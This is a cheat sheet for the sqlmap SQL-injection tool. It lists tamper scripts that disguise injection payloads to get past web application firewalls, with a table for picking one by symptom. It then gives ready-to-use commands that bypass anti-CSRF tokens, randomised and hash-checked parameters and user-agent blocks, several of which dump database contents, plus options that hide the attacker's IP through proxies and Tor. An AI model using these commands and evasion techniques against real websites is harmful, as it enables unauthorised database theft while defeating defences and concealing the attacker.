Tamper Scripts
| Tamper-Script | Description |
|---|
0eunion | Replaces instances of UNION with e0UNION |
base64encode | Base64-encodes all characters in a given payload |
between | Replaces greater than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND # |
commalesslimit | Replaces (MySQL) instances like LIMIT M, N with LIMIT N OFFSET M counterpart |
equaltolike | Replaces all occurrences of operator equal (=) with LIKE counterpart |
halfversionedmorekeywords | Adds (MySQL) versioned comment before each keyword |
modsecurityversioned | Embraces complete query with (MySQL) versioned comment |
modsecurityzeroversioned | Embraces complete query with (MySQL) zero-versioned comment |
percentage | Adds a percentage sign (%) in front of each character (e.g. SELECT -> %S%E%L%E%C%T) |
plus2concat | Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart |
randomcase | Replaces each keyword character with random case value (e.g. SELECT -> SEleCt) |
space2comment | Replaces space character ( ) with comments `/ |
space2dash | Replaces space character ( ) with a dash comment (--) followed by a random string and a new line (\n) |
space2hash | Replaces (MySQL) instances of space character ( ) with a pound character (#) followed by a random string and a new line (\n) |
space2mssqlblank | Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters |
space2plus | Replaces space character ( ) with plus (+) |
space2randomblank | Replaces space character ( ) with a random blank character from a valid set of alternate characters |
symboliclogical | Replaces AND and OR logical operators with their symbolic counterparts (&& and |) |
versionedkeywords | Encloses each non-function keyword with (MySQL) versioned comment |
versionedmorekeywords | Encloses each keyword with (MySQL) versioned comment |
How to choose the RIGHT tamper (logic)
--tamper=PARAM1,PARAM2
| Symptom | Likely Filter | Tamper |
|---|
| Spaces blocked | Regex filter | space2comment |
| Keywords blocked | Case-sensitive WAF | randomcase |
| Quotes blocked | Input filter | apostrophemask |
| Operators blocked | Simple blacklist | between |
| Encoding accepted | Weak decoding | charencode |
Anti-CSRF Token Bypass
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
Unique Value Bypass
sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 --dump
Calculated Parameter Bypass
sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id.encode()).hexdigest()" --batch -v 5 --dump
User-agent Blacklisting Bypass
--random-agent
IP Address Concealing
--proxy (e.g. --proxy="socks4://177.39.187.70:33283")
--proxy-file
--check-tor
Chunked
--chunked
